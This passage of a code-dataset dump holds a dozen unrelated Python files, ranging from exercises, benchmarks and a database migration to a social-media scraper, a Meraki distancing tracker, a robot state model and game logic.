'metrics':{'maxSessions':10, 'currentSessions':8}\n }\n\norchPool.register_orchestrator(js1)\norchPool.register_orchestrator(js2)\norchPool.register_orchestrator(js3)\norchPool.update_metrics(met)\n\n\n#%%\nif __name__ == \"__main__\": \n \n KEEP_RUNNING = True\n server_thread = Thread(target=http_server)\n server_thread.daemon = True\n server_thread.start()\n \n #server_thread.join()\n \n main_thread = Thread(target=main)\n main_thread.start()\n\n\n \n \n \n \n \n \n ","repo_name":"musicmank545/livepeer","sub_path":"router_v3.py","file_name":"router_v3.py","file_ext":"py","file_size_in_byte":3736,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"22703462012","text":"\"\"\"\nWrite a Python program that, given three times of completion tS, tC and tR (in hours; one for each stage) by user input, in this order, checks if the participant met all the requirements. If so, it should print the total time. 
Otherwise, it should print the first factor that caused the disqualification (“Time”, “Swimming”, “Cycling” or “Running”, in this order).\n\"\"\" \n\ntS = float(input())\ntC = float(input())\ntR = float(input())\n\ntT = tS + tC + tR\n\nvS = 1.5 / tS\nvC = 40 / tC\nvR = 10 / tR\n\nif tT >= 4:\n print('Time')\nelif vS < 2:\n print('Swimming')\nelif vC < 20:\n print('Cycling')\nelif vR < 8:\n print('Running')\nelse:\n print(tT)\n\n\n\"\"\"\npublic:\n'0.4', '1.2', '0.4'\n'1', '1', '4'\n'0.5', '1', '2.2'\n'0.2', '1.8', '0.5'\npublic:\n'0.4', '1.3', '0.8'\n'1', '2', '0.9'\n'0.6', '3', '0.1'\n'0.5', '2', '1.4'\n\"\"\"\n","repo_name":"eukia/FEUP-FPRO","sub_path":"PE/PE01/triathlon.py","file_name":"triathlon.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35878078712","text":"import argparse\n\nfrom config import load_config\nfrom core.factory import Factory\nfrom core.serializers.jsonserializer import JSONSerializer\nfrom core.serializers.xmlserializer import XMLSerializer\nimport math\n\n\ndef my_decor(meth):\n def inner(*args, **kwargs):\n print('I am in my_decor')\n return meth(*args, **kwargs)\n\n return inner\n\n\nclass A:\n x = 10\n\n @my_decor\n def my_sin(self, c):\n return math.sin(c * self.x)\n\n @staticmethod\n def stat():\n return 145\n\n def __str__(self):\n return 'AAAAA'\n\n def __repr__(self):\n return 'AAAAA'\n\n\nclass B:\n def __init__(self, a, b):\n self.a = a\n self.b = b\n\n @property\n def prop(self):\n return self.a * self.b\n\n @classmethod\n def class_meth(cls):\n return math.pi\n\n\nclass C(A, B):\n pass\n\n\nser = Factory.create_serializer('json')\n\nvar = 15\nvar_ser = ser.dumps(var)\nvar_des = ser.loads(var_ser)\nprint(var_des)\n\nC_ser = ser.dumps(C)\nC_des = ser.loads(C_ser)\n\nc = C(1, 2)\nc_ser = ser.dumps(c)\nc_des = ser.loads(c_ser)\n\nprint(c_des)\nprint(c_des.x)\nprint(c_des.my_sin(10))\nprint(c_des.prop)\nprint(C_des.stat())\nprint(c_des.class_meth())\n\n\ndef f(a):\n for i in a:\n yield i\n\n\ng = f([1, 2, 3])\nprint(next(g))\ng_s = ser.dumps(g)\ng_d = ser.loads(g_s)\nprint(next(g_d))\n\n\ndef a(x):\n yield x[0]\n x[1] += 2\n yield\n\n\nfunc = lambda x: x*x\n\nser = Factory.create_serializer('json')\n\na = ser.dumps(func)\nb= ser.loads(a)\n\nprint(b(5))\n#\n# def main():\n# parser = argparse.ArgumentParser(description=\"Serializer Utility\")\n# parser.add_argument(\"--config\", help=\"Path to the configuration file\")\n# parser.add_argument(\"file_from\", help=\"Path to the input file\")\n# parser.add_argument(\"file_to\", help=\"Path to the output file\")\n# parser.add_argument(\"format_from\", help=\"Input format (json/xml)\")\n# parser.add_argument(\"format_to\", help=\"Output format (json/xml)\")\n#\n# args = parser.parse_args()\n#\n# if args.config:\n# file_from, file_to, format_from, format_to = load_config(args.config)\n# else:\n# file_from = args.file_from\n# file_to = args.file_to\n# format_from = args.format_from\n# format_to = args.format_to\n#\n# serializer = Factory.create_serializer(format_from)\n#\n# if format_to == \"json\":\n# if format_from == \"json\":\n# data = serializer.load(file_from)\n# serializer.dump(data, file_to)\n# elif format_from == \"xml\":\n# data = XMLSerializer.load(file_from)\n# JSONSerializer.dump(data, file_to)\n# elif format_to == \"xml\":\n# if format_from == \"json\":\n# data = JSONSerializer.load(file_from)\n# XMLSerializer.dump(data, file_to)\n# elif format_from == \"xml\":\n# data = 
serializer.load(file_from)\n# serializer.dump(data, file_to)\n#\n# print(\"Operation completed successfully.\")\n\n\n# if __name__ == '__main__':\n# main()\n","repo_name":"donshester/----","sub_path":"Lab3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12632645386","text":"import asyncio\nimport os\nimport timeit\n\nimport asgiref\nimport django\nfrom django.core.asgi import get_asgi_application\ntry:\n from django_websockets2.asgi_handler import \\\n get_asgi_application as get_fast_asgi_application\nexcept ImportError:\n get_fast_asgi_application = None\n\n\nREPEAT_COUNT = 10000\nFAST_ASGI = False\nASYNC_VIEW = True\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'app.settings')\n\n\nclass Context:\n status_code = None\n content = None\n\n async def send(self, data):\n if data['type'] == 'http.response.start':\n self.status_code = data['status']\n elif data['type'] == 'http.response.body':\n self.content = self.content or b'' + data['body']\n\n @staticmethod\n async def receive():\n return {\n 'type': '',\n 'body': b'ping'\n }\n\n\nclass Executor:\n def __init__(self):\n if FAST_ASGI:\n self.app = get_fast_asgi_application()\n else:\n self.app = get_asgi_application()\n\n def __call__(self):\n scope = {\n 'type': 'http',\n 'path': '/async/' if ASYNC_VIEW else '/sync/',\n 'method': 'GET',\n }\n response = Context()\n asyncio.run(self.app(scope, response.receive, response.send))\n if response.status_code != 200 or response.content != b'ping':\n raise Exception('Wrong response')\n\n\nexecutor = Executor()\n\nprint(django.VERSION)\nprint(asgiref.__file__)\nprint(timeit.timeit(executor, number=REPEAT_COUNT))\n","repo_name":"kozzztik/django_speedtest","sub_path":"test_asgi.py","file_name":"test_asgi.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11999115489","text":"\"\"\"Add user channel relationship table\n\nRevision ID: 6324cbc20fd0\nRevises: 0da2318334c3\nCreate Date: 2022-11-07 04:56:21.422811\n\n\"\"\"\nimport sqlalchemy as sa\n\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"6324cbc20fd0\"\ndown_revision = \"0da2318334c3\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_unique_constraint(None, \"users\", [\"user_id\"])\n op.create_table(\n \"users_channels\",\n sa.Column(\"id\", sa.Integer(), nullable=False),\n sa.Column(\"channel_id\", sa.BigInteger(), nullable=False),\n sa.Column(\"user_id\", sa.BigInteger(), nullable=False),\n sa.ForeignKeyConstraint(\n [\"channel_id\"],\n [\"channels.channel_id\"],\n ),\n sa.ForeignKeyConstraint(\n [\"user_id\"],\n [\"users.user_id\"],\n ),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_constraint(None, \"users\", type_=\"unique\")\n op.drop_table(\"users_channels\")\n # ### end Alembic commands ###\n","repo_name":"c2dc/telegram-bot","sub_path":"alembic/versions/6324cbc20fd0_add_user_channel_relationship_table.py","file_name":"6324cbc20fd0_add_user_channel_relationship_table.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"19606193390","text":"from deeprl_hw3 import imitation\nfrom keras.optimizers import Adam\nimport gym\n\nexpert = imitation.load_model('CartPole-v0_config.yaml',\n 'CartPole-v0_weights.h5f')\nenv = gym.make('CartPole-v0')\nhard_env = gym.make('CartPole-v0')\nhard_env = imitation.wrap_cartpole(hard_env)\n\n# imitation.generate_expert_training_data(expert, env)\n\n\n\nprint('Expert')\nimitation.test_cloned_policy(env, expert, render=False)\nimitation.test_cloned_policy(hard_env, expert, render=False)\nfor num_expert_episodes in [1,10,50,100]:\n# for num_expert_episodes in [1]:\n print('==================')\n print('Clone with ' + str(num_expert_episodes) + ' episode samples')\n s, a = imitation.generate_expert_training_data(expert, env,\n num_episodes=num_expert_episodes,\n render=False)\n clone = imitation.load_model('CartPole-v0_config.yaml')\n adam = Adam(lr=0.00025)\n clone.compile(adam, loss='binary_crossentropy', metrics=['accuracy'])\n hc = clone.fit(s,a, batch_size=32, epochs=50, verbose=0)\n\n print('Final Train Loss: ' + str(hc.history['loss'][-1]))\n print('Final Train Accuracy: ' + str(hc.history['acc'][-1])) \n imitation.test_cloned_policy(env, clone, render=False)\n imitation.test_cloned_policy(hard_env, clone, render=False) \n \n\n","repo_name":"rickgoldstein12/HW3","sub_path":"Q2/problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17030685098","text":"###this is a test file by xuxw(xuxw76@yahoo.com)\n### it's all right\nimport Magnus\nw1=Magnus.Word()\nw2=Magnus.Word()\ng=Magnus.FPGroup()\nag=Magnus.AbelianGroup( g)\na=Magnus.AbelianInfinitenessProblem( g)\na.startComputation( )\nx=a.continueComputation( ) \nx=a.done( )\nx=a.isInfinite( ) \n","repo_name":"markuspf/magnus","sub_path":"branches/daly/version10/back_end/Group/swig/test/AbelianInfinitenessProblem.py","file_name":"AbelianInfinitenessProblem.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29805263760","text":"# build_feature_set.py\n\nimport os\nimport zipfile\nimport tempfile\nimport sys\nimport csv\nimport pandas as pd\nimport numpy as np\nimport datetime\nimport math\nimport random\n\nexample_len = 4*4\nexample_step = 4*2\n\n# get_files_in_directory\ndef get_files_in_directory(directory, filter):\n for dir_name, _, files in os.walk(directory):\n for file in files:\n if filter in file:\n yield os.path.join(dir_name, file)\n# main\ndef main():\n\n if (len(sys.argv) < 2):\n print('ohlc files path / training set csv path missing')\n print('Quitting...')\n quit()\n\n ohlc_path = sys.argv[1]\n\n if (os.path.exists(ohlc_path) == False):\n print('path does not exist')\n quit()\n\n print(ohlc_path)\n\n ohlc_files = get_files_in_directory(ohlc_path, '.csv')\n output_file = sys.argv[2]\n\n training_set = []\n\n for ohlc_file in ohlc_files:\n #normalise\n #get training examples\n #train map\n\n print(ohlc_file)\n\n #read csv\n df 
= pd.read_csv(ohlc_file)\n dates = df[['open_time']]\n\n #normalise\n diff = df[['open_price', 'close_price', 'high_price', 'low_price']].diff(axis=0)\n norm = diff.divide(df[['open_price', 'close_price', 'high_price', 'low_price']])\n \n # flatten and drop the first four because they're NAN\n norm_flat = norm.values.flatten()[4:]\n\n size_len = len(norm_flat)\n num_examples = int(math.floor(size_len / example_len))\n\n for n in range(num_examples):\n i_offset = n * example_step\n i_offset_end = i_offset + example_len\n\n if (i_offset_end + 4) >= size_len:\n break \n\n #extract from i_offset tp i_offset_end and put into new aray\n sample = norm_flat[i_offset:i_offset_end]\n\n norm_min = sample.min()\n norm_max = sample.max()\n\n sample_norm = np.divide(sample - norm_min * np.ones(len(sample)), norm_max - norm_min)\n\n current_date_index = int(math.floor(i_offset / 4) + 1)\n next_close_price_index = i_offset_end + 4\n\n current_date = dates.loc[current_date_index]\n sample_strings = ['{:.10f}'.format(x) for x in sample_norm]\n \n # we want the normalised price but not scaled\n next_price = norm_flat[next_close_price_index]\n \n next_price_class = 0\n \n # classify the price change\n if next_price >= 0.0001:\n next_price_class = 1\n elif next_price <= -0.0001:\n next_price_class = 2\n\n write = [current_date.to_string(index=False)] + sample_strings + [str(next_price_class)] \n training_set.append(write)\n\n # write the training_set in random order to a csv\n with open(output_file, 'w') as csvfile:\n writer = csv.writer(csvfile, delimiter=',', quoting=csv.QUOTE_MINIMAL, lineterminator='\\n')\n\n # TODO write headers\n headers = ['time_stamp'] + [str(x) for x in range(1, example_len + 1)] + ['next_price']\n writer.writerow(headers) \n\n for index in random.sample(range(0, len(training_set)), len(training_set)):\n writer.writerow(training_set[index])\n \nif __name__ == \"__main__\":\n # stuff only to run when not called via 'import' here\n main()","repo_name":"jul1278/ML-Forex-Forecasting","sub_path":"build_training_set.py","file_name":"build_training_set.py","file_ext":"py","file_size_in_byte":3409,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"37328368069","text":"from main.models import Organisation\nfrom main.models import Network\nfrom main.models import Device\nfrom main.models import Snapshot\nfrom main.models import UserProfile\nfrom django.core import serializers\nimport requests\nimport json\nimport math\nimport meraki\nimport datetime\nimport time\n\ndef get_coords(scanning_api_url,apikey,serial):\n \"\"\" gets coordinates of scanning api url\"\"\"\n if scanning_api_url in (\"\",None):\n return [\"Please set your scanning API URL in your profile\"]\n #creation of map comes here + business logic\n\n body = {\"key\":\"randominsert!!222_\"}\n resp = requests.post(scanning_api_url, body, {\"Content-Type\":\"application/json\"})\n found = False\n\n resp_json = resp.json()\n for outter in range(len(resp_json['body']['data']['observations'])):\n dist_list = []\n for inn in resp_json['body']['data']['observations']:\n long = resp_json['body']['data']['observations'][outter]['location']['lng']\n lat = resp_json['body']['data']['observations'][outter]['location']['lat']\n hav = haversine(long,lat,inn['location']['lng'],inn['location']['lat'])\n if hav < 2:\n text = \"\" + \"%.2f\" % hav\n found = True\n else:\n text = \"\" + \"%.2f\" % hav\n text+= ' - ' + inn['clientMac'] + ''\n dist_list.append(text)\n\n 
resp_json['body']['data']['observations'][outter]['distances'] = dist_list\n\n #if found:\n #Create snapshot if more than one person in camera zone (entire frame)\n #dash = meraki.DashboardAPI(apikey)\n\n #analytics_response = dash.camera.getDeviceCameraAnalyticsOverview(serial)\n\n #if analytics_response['entrances'] > 1: #More than one person in zone\n #url_response = dash.camera.generateDeviceCameraSnapshot(serial) #Pic\n #current_time = datetime.datetime.now()\n\n #all_users = UserProfile.objects.filter(apikey = apikey)\n\n #for user_profile in all_users:\n #new_snapshot = Snapshot.objects.create(\n #user = user_profile.user,\n #url = url_response['url'],\n #time = current_time.strftime(\"%c\")\n #)\n #new_snapshot.save()\n\n return resp_json['body']['data']['observations']\n\n\ndef haversine(lat1, lon1, lat2, lon2):\n \"\"\" An implementation of the haversine formula to\n caluclate distance between 2 points (long,lat) on earth)\"\"\"\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(math.radians, [lon1, lat1, lon2, lat2])\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n\n arcsin = math.sin(dlat/2)**2 + math.cos(lat1) * math.cos(lat2) * math.sin(dlon/2) ** 2\n\n result = 2 * math.asin(math.sqrt(arcsin))\n radius = 6371.1370 # Radius of earth km\n\n return result * radius * 1000\n\n\nwhile True:\n for user in list((UserProfile.objects.all())):\n for org in list((Organisation.objects.filter(apikey=user.apikey))):\n print(org.apikey)\n for net in (Network.objects.filter(org=org)):\n \n if(net.scanningAPIURL != None):\n #get_coords(network.scanningAPIURL)\n for device in list((Device.objects.filter(net=net))):\n if (device.devModel == 'MV12N'):\n get_coords(net.scanningAPIURL,user.apikey,device.devSerial) \n time.sleep(60)","repo_name":"Horse-Lips/Cisco_Meraki_COVID_Tracker","sub_path":"cisco_dashboard/main/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":3487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"335953303","text":"from api import Gab\nimport json\n\ngab = Gab('dheerajpreddy', 'Test@123')\n\nwith open('username.json', 'r') as fp:\n people = json.load(fp)\nfp.close()\n\ntotal = 50000\ncount = 0\nhaha = 0\n\nwith open('newgabs.json', 'w') as f:\n\tjson.dump([], f)\nf.close()\n\nfor user in people:\n\tprint (haha)\n\tprint (count)\n\tprint ('\\n')\n\tif count >= total:\n\t\tbreak\n\thaha += 1\n\tprint (user)\n\ttry:\n\t\twith open('newgabs.json', 'r') as fp:\n\t\t\tdata = json.load(fp)\n\t\tfp.close()\n\t\tusername = user['username']\n\t\tgabs = gab.getusertimeline(username, 100)\n\t\tcount += len(gabs)\n\t\tdata += gabs\n\t\twith open('newgabs.json', 'w') as f:\n\t\t\tjson.dump(data, f)\n\t\tf.close()\n\texcept:\n\t\tcontinue\n","repo_name":"dheerajpreddy/GAB-Analysis","sub_path":"src/collect_gabs.py","file_name":"collect_gabs.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"4565378503","text":"#!/usr/bin/python3\n\"\"\"\nErrors modules\nCustom templates for error handling\n\"\"\"\n\nfrom flask import render_template, url_for, request\nfrom flask_login import current_user\nfrom models import storage, Recruiter\nfrom web_static.handlers import bp\n\n\n@bp.app_errorhandler(404)\ndef not_found_error(error):\n url = request.path\n print(\"404 error handler called for this url: {}\".format(url))\n is_recruiter = False\n if current_user.is_authenticated:\n user = 
storage.get_by_id(current_user.id)\n if isinstance(user, Recruiter):\n is_recruiter = True\n return render_template('404.html', is_recruiter=is_recruiter)\n # url = url_for('views.home')\n # print(\"url_for('home') is : {}\".format(url))\n return render_template('404.html', is_recruiter=is_recruiter), 404\n\n\n@bp.app_errorhandler(403)\ndef not_found_error(error):\n print(\"403 error handler called\")\n is_recruiter = False\n if current_user.is_authenticated:\n user = storage.get_by_id(current_user.id)\n if isinstance(user, Recruiter):\n is_recruiter = True\n return render_template('403.html', is_recruiter=is_recruiter)\n return render_template('403.html', is_recruiter=is_recruiter), 403\n\n\n@bp.app_errorhandler(500)\ndef internal_error(error):\n print(\"500 error handler called\")\n storage.roll_back()\n is_recruiter = False\n if current_user.is_authenticated:\n user = storage.get_by_id(current_user.id)\n if isinstance(user, Recruiter):\n is_recruiter = True\n return render_template('500.html', is_recruiter=is_recruiter)\n return render_template('500.html', is_recruiter=is_recruiter), 500\n","repo_name":"Sumshi/Portfolio-CareerLink","sub_path":"web_static/handlers/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"69940490485","text":"class DataModel:\n def __init__(self):\n self.QRcodeContent = None\n self.dateTimeStamp = None\n self.startTimeStamp = None\n self.endTimeStamp = 0\n self.isDriving = False\n self.state = HerbEstates[\"initial\"]\n self.distanceDriven = 0\n self.plantImage = None\n self.recognisedPlantsList1 = None\n self.recognisedPlantsListx = None\n self.amountOfPlantxScanned = 1\n self.plant1Type = \"noch undefiniert\"\n self.commonName = \"\"\n self.plantMatchPosition = \"noch undefiniert\"\n self.isFinished = False\n self.imageURL = \"\"\n \n def toJSON(self, restAPIKey):\n return {\n \"id\": 1,\n \"dateTimeStamp\": self.dateTimeStamp,\n \"startTimeStamp\": self.startTimeStamp,\n \"endTimeStamp\": self.endTimeStamp,\n \"distance\": self.distanceDriven,\n \"state\": self.state,\n \"plantType\": self.plant1Type,\n \"commonName\": self.commonName,\n \"plantMatchPosition\": self.plantMatchPosition,\n \"isFinished\": self.isFinished,\n \"imageURL\": self.imageURL,\n \"apiKey\": restAPIKey\n }\n \n def resetModel(self):\n self.QRcodeContent = None\n self.dateTimeStamp = None\n self.startTimeStamp = None\n self.endTimeStamp = 0\n self.isDriving = False\n self.state = HerbEstates[\"initial\"]\n self.distanceDriven = 0\n self.plantImage = None\n self.recognisedPlantsList1 = None\n self.recognisedPlantsListx = None\n self.amountOfPlantxScanned = 1\n self.plant1Type = \"noch undefiniert\"\n self.commonName = \"\"\n self.plantMatchPosition = \"noch undefiniert\"\n self.isFinished = False\n self.imageURL = \"\"\n\n# HerbE states\nHerbEstates = {\n \"initial\": \"Herb-E ist bereit für die Fahrt. Start-Knopf drücken um zu beginnen.\",\n \"driving\": \"Herb-E ist am fahren. Der Ultraschallsensor sucht nach Objekten und die Kamera nach QR-Codes.\",\n \"ultraDetected\": \"Herb-E hat mit dem Ultraschallsensor ein Objekt erkannt und sucht jetzt nach QR-Codes.\",\n \"qrDetected\": \"Herb-E hat ein QR-Code erkannt, schiesst ein Foto und sucht nach der Pflanzenart.\",\n \"stop\": \"Herb-E hat angehalten.\",\n \"stopButtonPressed\": \"Der Stop-Button wurde gedrückt. 
Herb-E ist bereit für einen erneuten Start.\",\n \"goal\": \"Herb-E hat seine Arbeit erledigt und das Ziel erreicht!!!\"\n}","repo_name":"dave1b/PREN_HerbE","sub_path":"Main_Model/DataModel.py","file_name":"DataModel.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"13539629995","text":"# https://leetcode.com/problems/minimum-area-rectangle/\n\nfrom typing import List\n\nclass Solution:\n \n # Runtime: 2857 ms, faster than 5.03% of Python3 online submissions for Minimum Area Rectangle.\n # Memory Usage: 14 MB, less than 99.83% of Python3 online submissions for Minimum Area Rectangle.\n \n def minAreaRect(self, points: List[List[int]]) -> int:\n \n hashset = set(map(tuple, points))\n \n area = float(\"inf\")\n for point1 in hashset:\n for point2 in hashset:\n \n x1, y1 = point1\n x2, y2 = point2\n \n if x1 < x2 and y1 < y2 and (x1, y2) in hashset and (x2, y1) in hashset:\n area = min(area, (x2-x1) * (y2 -y1))\n \n return area != float(\"inf\") and area or 0","repo_name":"Jiganesh/Loads-Of-Logic","sub_path":"hashTable/minimumAreaRectangle.py","file_name":"minimumAreaRectangle.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":189,"dataset":"github-code","pt":"76"} +{"seq_id":"9272152268","text":"\nfrom math import floor\nfrom Entities.ball import Ball\nfrom Entities.enemy import Enemy\nfrom Entities.player import Player\nfrom Game_Control.Vector import Vector\nimport SimpleGUICS2Pygame.simpleguics2pygame as simplegui\nfrom Entities.power_ups import Power_Up\nfrom Entities.mass import Mass\nimport random\nfrom Game_Control.keyboard import Keyboard\n\nfrom Maps.line import Line\n\nclass Interaction:\n \"\"\"Handles the interactions between game objects. \n \"\"\"\n def __init__(self, lines: list[Line], player: Player, enemy: list[Enemy], time: int, keyboard: Keyboard, frame:simplegui.Frame) -> None:\n \"\"\"Initializes interaction object to handle interactions between game objects.\n \n Args:\n `lines (Line)`: walls of the game where balls bounce.\n `player (Ball)`: player of the game.\n `enemy (Ball)`: enemy that move around the map (enemies).\n `time (int)`: time limit for the game.\n `keyboard (Keyboard)`: handles keyboard input to make the player move.\n `frame (Frame)`: interactive window where game play takes place.\n \"\"\"\n #^ Entities:\n self.enemy: Enemy = enemy\n self.player: Player = player\n self.power_ups: list[Power_Up] = []\n self.mass: list[Mass] = []\n self.lines: Line = lines\n\n #^ Environment:\n self.keyboard: Keyboard = keyboard \n self.kill_counter: int = 0\n self.frame = frame\n \n #^ Timers:\n self.time_limit: int = time # The limit for which the game will run \n self.time_count = simplegui.create_timer(1000, self.countdown) # Counts how many times method is called. Used for computing one second. \n self.time_count.start()\n self.player_power_up_timer = simplegui.create_timer(10_000, self.reset_player_power_up) # How long the power up will last\n self.power_up_timer_create = simplegui.create_timer(15_000, self.add_power_up) # Create a power up object every set time\n self.power_up_timer_create.start()\n self.enemy_split_timer = simplegui.create_timer(30_000, self.enemy_split) # Split the enemy every minute\n self.enemy_split_timer.start()\n\n #^ Draw: \n def draw(self, canvas) -> None:\n \"\"\"Draws each element in list of objects. \n Method calls other draw methods for the specific objects. 
\n \n Args:\n `canvas (Canvas)`: where the gameplay takes place. \n \n Calls:\n `self.update()`: used to update the state and position of the balls. \n `self.draw_player(canvas)`: draws the player in the canvas\n `self.draw_enemy(canvas)`: draws the enemies in the canvas\n `self.draw_mass(canvas)`: draws the mass in the canvas\n `self.draw_power_ups(canvas)`: draw the powerups in the canvas\n `self.draw_map(canvas)`: draws game map in the canvas\n `self.draw_store(canvas)`: draws player scores in the canvas\n \"\"\"\n self.update() # Update method called to update the ball objects\n self.draw_player(canvas)\n self.draw_enemy(canvas)\n self.draw_mass(canvas)\n self.draw_power_ups(canvas)\n self.draw_map(canvas)\n self.draw_score(canvas)\n \n def draw_player(self, canvas) -> None:\n \"\"\"Draws the player in the canvas.\n The player is drawn only if the it is alive. \n If the player is not alive, then the it will not be drawn. \n An if statement is used to check whether the player is alive. \n \n Args:\n `canvas (Canvas)`: where the game play takes place.\n\n Calls:\n `Player.draw(canvas)`: calls the draw method from Player object to draw player object. \n \"\"\"\n if (self.player.alive): # Check whether player object drawn if alive\n self.player.draw(canvas)\n\n def draw_enemy(self, canvas) -> None:\n \"\"\"Draws the enemies. \n There are multiple enemy objects stored in the list. \n A for loop is used to iterate over each enemy in the list. \n For each enemy, the draw method of the current enemy object is called. \n\n Args:\n `canvas (Canvas)`: where the game play takes place\n\n Calls:\n `Enemy.draw(canvas)`: calls the draw method from Enemy object to draw player object.\n \"\"\"\n for enemy in self.enemy: # For each ball stored in the ball list\n enemy.draw(canvas) # Draw the current ball\n\n def draw_mass(self, canvas) -> None:\n \"\"\"Draws the enemies. \n There are multiple mass objects stored in the list. \n A for loop is used to iterate over each mass in the list. \n For each mass, the draw method of the current mass object is called. \n\n Args:\n `canvas(Canvas)`: where the game play takes place. \n\n Calls:\n `Mass.draw(canvas)`: calls the draw method from Mass object to draw mass object.\n \"\"\"\n for mass in self.mass: # Iterates over each mass in the list\n mass.draw(canvas)\n\n def draw_power_ups(self, canvas) -> None:\n \"\"\"Draws the power ups.\n There are multiple power ups objects stored in the list. \n A for loop is used to iterate over each power up in the list. \n For each power up, the draw method of the current power up object is called. \n\n Args:\n `canvas (Canvas)`: where the game play takes place. \n\n Calls:\n `Power_Up.draw(canvas)`: calls the draw method from Power_Up object to draw power up object.\n \"\"\"\n for power_up in self.power_ups:\n power_up.draw(canvas) \n\n def draw_map(self, canvas) -> None:\n \"\"\"Draws the walls around the canvas. \n The walls (thick lines) are used to as boundaries for ball objects. \n The ball objects bounce upon collision with the wall. \n There are multiple walls which are stored in the list. \n A for loop is used to iterate over the walls stored in the list. \n For each wall object, the draw method of the wall is called. \n\n Args:\n `canvas (Canvas)`: where the game play takes place. 
\n\n Calls:\n `Line.draw(canvas)`: calls the draw method from Line object to draw line object.\n \"\"\"\n for line in self.lines: # For each line stored in the line list\n line.draw(canvas) # Draw the current line \n\n def draw_score(self, canvas) -> None:\n \"\"\"Draws score as text. \n Draws the number of enemies killed (engulfed) by the player. \n Draws the size of the player by using the radius of the player. \n Draws the time remaining. \n Draws the type of the power up currently being used. \n\n If the time limit is unlimited or greater than 10, then the text will be green indicating that there is plenty of time. \n If the time is less than 10, then the text will be red indicating that the time is running out. \n\n These are all drawn in on line along the top wall. \n\n Args:\n `canvas (Canvas)`: where the game play takes place. \n \"\"\"\n #^ Checks Time Limit:\n if (self.time_limit < 0): # Decrementing from 0 means that the time limit is never reached\n remaining_time = \"Unlimited\"\n else: # If there is a time limit then it is displayed\n remaining_time = self.time_limit\n\n #^ Checks Remaining Time: \n if (self.time_limit > 10 or self.time_limit < 0): # If the time remaining is unlimited or more than 10 seconds\n colour: str = \"green\"\n else:\n colour: str = \"red\" # If the time remaining is 0 to 9 seconds\n \n canvas.draw_text(f'Kills: {self.kill_counter} Size: {round(self.player.radius, 1)} Time: {remaining_time} Power Up: {self.player.power_up}', (20, 13), 18, colour)\n \n #^ Update:\n def update(self) -> None:\n \"\"\"Updates balls in the list. \n This method handles updating the enemies stored in the enemy list, the single player, the mass stored in a list, and the power ups stored in a list. \n Each ball (player, enemy and mass) stored is an object. \n Enemies, players, mass, and power ups are updated by calling their respective update methods. \n \n Function to check if game is over is called for checking.\n This function checks whether the game is over and executes the appropriate actions. \n\n Calls:\n `self.update_player()`: handles updating position and state of the player. \n `self.update_enemy()`: handles updating position and state of the enemy.\n `self.update_mass()`: handles updating position and state of the mass. \n `self.update_power_ups()`: handles checking collision with player object. \n `self.game_finish()`: checks whether the game is over (if player has lost or won). \n \"\"\"\n self.update_player() \n self.update_enemy()\n self.update_mass()\n self.update_power_ups()\n self.game_finish()\n\n def update_player(self) -> None:\n \"\"\"Update the player. \n Method handles updating the position of the player and bouncing upon collision with walls. \n To update the position of the player, the update method of the player object itself is called. \n \n Keyboard controls are used to control the player. \n When a key is pressed, the appropriate velocity according to the direction is incremented. \n This is handled by the `player_control()` method. \n\n Since the player loses mass to change direction manually, \n `Player.can_move()` is called to check if there is enough mass to move. \n\n There is a single player which is updated normally. \n\n Calls:\n `Player.update()`: handles updating the position of the player object. \n `Player.can_move()`: checks whether there is enough mass to move. \n `self.bounce()`: handles the updating the velocity of the player upon collision with wall. 
\n `self.player_control()`: moves the player using keypresses by updating the position. \n \"\"\"\n self.player.update()\n self.bounce(self.player) \n self.player_controls()\n self.player.can_move()\n\n def player_controls(self) -> None:\n \"\"\"Moves the player according the key being pressed. \n Depending the key being pressed, the velocity is incremented on the specific axes. \n There is a limit for how fast the player can travel. \n \n Once this speed limit is reached, the statement is not executed. \n This means that the speed will not longer be increased as velocity will not be incremented and \n mass will not be ejected. \n\n Additionally, if the player runs out of mass, then it cannot change velocity. \n The method checks whether the player can move using an if statement. \n\n When the player object receives a power up, the speed limit is increases. \n\n Calls: \n `self.eject_mass()`: ejects the mass from player when position is updated manually.\n \"\"\"\n velocity_limit = 5\n\n #^ Check Power Ups:\n if (self.player.power_up == 